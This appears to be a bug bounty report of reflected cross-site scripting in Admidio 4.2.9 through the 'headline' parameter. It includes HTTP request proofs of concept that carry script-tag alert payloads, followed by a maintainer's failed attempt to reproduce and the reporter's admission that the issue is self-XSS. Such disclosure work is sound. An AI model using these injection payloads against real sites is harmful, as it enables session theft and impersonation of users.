Cross site scripting in Admidio 4.2.9 via headline parameter in admidio/admidio
Reported on
Jun 18th 2023
Description
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user input within the output it generates.
Proof of Concept
URL: http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php
Vulnerable Parameter: headline
# Details:
URL encoded GET input headline was set to Announcements"><script>alert(9370)</script>
The input is reflected inside a tag parameter between double quotes.
HTTP Request:
GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> HTTP/1.1
Referer: http://localhost/admidio-4.2.9/
Cookie: ADMIDIO_admidio_adm_SESSION_ID=1vv2p802t9j8fiek592n3p6uqj; ADMIDIO_admidio_adm_cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
HTTP Response:
Redacted [*]
<p class="lead">The URL in the field <strong>http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script></strong> contains invalid characters.<br /><br />Only alphabetic characters, umlauts, numbers 0-9 and special characters .-+_:/#?= are allowed.</p>
How to fix this vulnerability:
Apply context-dependent encoding and/or validation to user input rendered on a page
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.
References
Hi,
I'm not able to reproduce that behavior. If I enter the url adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> than I got a headline e.g. Announcements">alert(9370) - but nothing else. No alert is shown or the response that you mentioned.
Hi Mark,
Good day!
Upon checking it seems that this is only a self xss which only works when the response is from burp suite please see the screenshot below:
Screenshot 1:
Screenshot 2:
Screenshot 3:
HTTP Request Used:
GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0">xxxx<script>alert(1)</script>xxxx&headline=Announcements">xxxx<script>alert(9370)</script> HTTP/1.1
Host: localhost
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: http://localhost/admidio-4.2.9/adm_program/overview.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_SESSION_ID=3b0nln1d94pi59vd8rhr30v9sq
Connection: close
I set the complexity to high because for me it's not that easy to get to this XSS only via link.